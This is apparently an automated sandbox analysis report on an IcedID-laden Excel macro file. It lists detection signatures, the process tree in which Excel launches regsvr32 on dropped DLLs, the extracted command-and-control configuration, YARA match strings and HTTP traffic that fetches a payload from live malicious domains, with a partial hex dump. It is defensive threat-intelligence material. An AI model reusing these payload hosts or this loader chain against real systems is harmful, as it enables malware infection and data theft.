Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report DeliveryConf535215.xlsm

Overview

General Information

Sample Name:DeliveryConf535215.xlsm
Analysis ID:444679
MD5:dcd1fa0b71a3bb9c11cf0899a6b3addb
SHA1:894e9de6e6aa9796236523697905baf0a6c7282d
SHA256:50d9eefeb3f4c066d06dfc84c1f4d2576f1544eeb85d2c9940f6b0932a77dcde
Tags:IcedIDxlsm
Infos:

Most interesting Screenshot:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapater information
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1296 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 3060 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1920 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2308 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_IcedID_1Yara detected IcedIDJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2101910318.0000000000290000.00000004.00000001.sdmpMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
    • 0x27c6:$internal_name: loader_dll_64.dll
    • 0x30b4:$string0: _gat=
    • 0x3114:$string1: _ga=
    • 0x30ec:$string2: _gid=
    • 0x30cc:$string3: _u=
    • 0x3026:$string4: _io=
    • 0x30d8:$string5: GetAdaptersInfo
    • 0x2b16:$string6: WINHTTP.dll
    • 0x27ea:$string7: DllRegisterServer
    • 0x27fc:$string8: PluginInit
    • 0x3080:$string9: POST
    • 0x3140:$string10: aws.amazon.com
    00000004.00000002.2111691413.00000000003E7000.00000004.00000020.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
      00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
        00000004.00000002.2109602309.0000000000110000.00000004.00000001.sdmpMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30b4:$string0: _gat=
        • 0x3114:$string1: _ga=
        • 0x30ec:$string2: _gid=
        • 0x30cc:$string3: _u=
        • 0x3026:$string4: _io=
        • 0x30d8:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3080:$string9: POST
        • 0x3140:$string10: aws.amazon.com
        00000005.00000002.2116608760.0000000000110000.00000004.00000001.sdmpMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30b4:$string0: _gat=
        • 0x3114:$string1: _ga=
        • 0x30ec:$string2: _gid=
        • 0x30cc:$string3: _u=
        • 0x3026:$string4: _io=
        • 0x30d8:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3080:$string9: POST
        • 0x3140:$string10: aws.amazon.com
        Click to see the 6 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.regsvr32.exe.110000.0.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x1bc6:$internal_name: loader_dll_64.dll
        • 0x1f16:$string6: WINHTTP.dll
        • 0x1bea:$string7: DllRegisterServer
        • 0x1bfc:$string8: PluginInit
        3.2.regsvr32.exe.20d0000.4.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30bc:$string0: _gat=
        • 0x311c:$string1: _ga=
        • 0x30f4:$string2: _gid=
        • 0x30d4:$string3: _u=
        • 0x302e:$string4: _io=
        • 0x30e0:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3088:$string9: POST
        • 0x3148:$string10: aws.amazon.com
        4.2.regsvr32.exe.130000.1.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30bc:$string0: _gat=
        • 0x311c:$string1: _ga=
        • 0x30f4:$string2: _gid=
        • 0x30d4:$string3: _u=
        • 0x302e:$string4: _io=
        • 0x30e0:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3088:$string9: POST
        • 0x3148:$string10: aws.amazon.com
        3.2.regsvr32.exe.290000.0.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x1bc6:$internal_name: loader_dll_64.dll
        • 0x1f16:$string6: WINHTTP.dll
        • 0x1bea:$string7: DllRegisterServer
        • 0x1bfc:$string8: PluginInit
        5.2.regsvr32.exe.110000.0.raw.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30b4:$string0: _gat=
        • 0x3114:$string1: _ga=
        • 0x30ec:$string2: _gid=
        • 0x30cc:$string3: _u=
        • 0x3026:$string4: _io=
        • 0x30d8:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3080:$string9: POST
        • 0x3140:$string10: aws.amazon.com
        Click to see the 4 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
        Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\XRAY.dll, CommandLine: regsvr32 -silent ..\XRAY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1296, ProcessCommandLine: regsvr32 -silent ..\XRAY.dll, ProcessId: 3060

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 3.2.regsvr32.exe.20d0000.4.unpackMalware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2111691413.00000000003E7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2111724951.0000000000407000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2117952085.00000000028A4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2116809079.0000000000467000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2308, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3060, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1920, type: MEMORY
        Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49172 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49174 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

        Software Vulnerabilities:

        barindex
        Document exploit detected (creates forbidden files)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to behavior
        Document exploit detected (drops PE files)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: lsdfik[1].fml.0.drJump to dropped file
        Document exploit detected (UrlDownloadToFile)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
        Document exploit detected (process start blacklist hit)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
        Source: global trafficDNS query: name: thousandsyears.download
        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 13.224.92.73:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.198.51:80

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: astrocycle.download
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 13:07:24 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 4274Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=VmvIn%2Bt8%2B%2Ba%2BScS%2FFU7rDNbdB4WhaK8GW%2F4tLDa5Y6N6ikv7oKqorLg9y1o%2Bo%2Bk1gOD%2FvsRhWJxxpzT1vTrLYdrRIy3DXL3BZlXJM6eVgPsCSrit2ZzKB%2B7T3%2BL3Ywtv19W0rJU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a90e4d9f024e3d-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 13:07:24 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 4273Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=s%2B8FAtNhnjQzr1O8UP9iUO08DcT1KxsaDvc7eha2EOsf1s2GNo8RKQERM9jS3FZgVQ56Yn9dYcZukmUANQD1gRcSFb5LWxl8mpfkjQj5s7CRS2qvwxr%2BerTCPw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a90e4f1fd42c22-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 13:07:24 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 4272Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=HxS6DVkhc1ZhRsctA4%2B4wRcXNfsXPSjIis2vJtDaAwWpiBqHwotxFztLYL%2B0PI3TPlFoVoVaXUfSfgm1bcUzX%2FeCFmdgedKItMbt9fWiw3XeisseZQAYXFiKEB4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a90e50ca8c2c2a-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:7080:54; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=313739363035:416C627573:31384337383432373833324243433531; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:7084:53; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=313739363035:416C627573:39463142354243374539333138353931; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:7088:53; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=313739363035:416C627573:37454443394536333630373541353235; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49172 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49174 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A04F74AC.pngJump to behavior
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:7080:54; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=313739363035:416C627573:31384337383432373833324243433531; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:7084:53; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=313739363035:416C627573:39463142354243374539333138353931; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:7088:53; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=313739363035:416C627573:37454443394536333630373541353235; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: .awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://sslOz equals www.linkedin.com (Linkedin)
